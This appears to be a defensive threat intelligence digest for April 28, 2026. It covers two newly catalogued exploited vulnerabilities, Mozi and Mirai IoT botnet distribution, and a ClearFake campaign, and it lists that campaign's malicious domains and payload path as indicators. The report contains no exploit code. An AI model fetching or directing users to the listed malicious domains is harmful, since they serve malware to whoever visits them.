On April 28, 2026, threat intelligence collection identified two critical vulnerabilities added to CISA's Known Exploited Vulnerabilities catalog, alongside significant malware distribution activity. Microsoft Windows Shell contains a protection mechanism failure vulnerability (CVE-2026-32202) enabling spoofing attacks, while ConnectWise ScreenConnect remains vulnerable to path traversal exploitation (CVE-2024-1708) that could lead to remote code execution. Organizations using these products should prioritize patching immediately.
Malware distribution activity remains elevated with 51 malicious URLs identified across URLhaus feeds. The threat landscape shows continued botnet infrastructure expansion, particularly Mozi and Mirai variants targeting IoT devices across multiple architectures (MIPS, ARM, x86). A notable ClearFake campaign leveraging leaf-themed domains (leafspring.garden, quartzprismcloud.garden, tundraflowunit.garden, basaltlogicnode.garden) demonstrates sophisticated domain generation and obfuscation techniques. The targeting of multiple CPU architectures and the sustained botnet activity indicate ongoing efforts to compromise vulnerable edge devices and build distributed attack infrastructure.
Two vulnerabilities added to CISA's Known Exploited Vulnerabilities catalog require immediate patching attention
Microsoft Windows Shell contains a protection mechanism failure vulnerability allowing unauthorized attackers to perform spoofing attacks over a network. This represents a new 2026 vulnerability with active exploitation indicated by CISA KEV inclusion.
ConnectWise ScreenConnect contains a path traversal vulnerability enabling remote code execution and unauthorized access to confidential data and critical systems. This vulnerability poses significant risk to organizations using remote support infrastructure.
Significant malware distribution activity detected with 51 malicious URLs, primarily targeting IoT devices with Mozi and Mirai botnet variants
Multiple distribution servers hosting Mozi botnet payloads targeting MIPS and ARM architectures across compromised IoT devices. At least 20+ distinct IP addresses observed serving Mozi variants, indicating sustained botnet expansion efforts targeting routers, cameras, and other embedded systems.
Coordinated Mirai distribution server hosting payloads for multiple architectures (MIPS, MIPSLE, ARM, ARM5, ARM6, ARM64, x86, AMD64) and Windows executable. The presence of bins.sh loader script and architecture-specific binaries indicates professional botnet operation targeting diverse device types.
ClearFake malware distributed across 19 subdomains using themed parent domains (leafspring.garden, quartzprismcloud.garden, tundraflowunit.garden, basaltlogicnode.garden). The uniform URI pattern (/cdk-msdn-3457325-null/load-file0dsdf567.chk) and nature-themed subdomain naming convention suggest automated domain generation algorithm (DGA) for resilient command infrastructure.
Analysis of observed malware distribution reveals sophisticated infrastructure management and multi-platform targeting strategies
Threat actors demonstrate advanced capabilities by maintaining synchronized payloads across 8+ CPU architectures (MIPS, MIPSLE, ARM variants, x86, AMD64). This approach maximizes botnet recruitment across heterogeneous IoT device landscape and indicates mature operational tradecraft.
ClearFake campaign employs themed domain generation pattern with nature-based keywords (leaf, quartz, prism, tundra, basalt) combined with technical terms (spring, cloud, flow, logic, mesh). This DGA approach provides infrastructure resilience against takedowns and enables rapid domain rotation.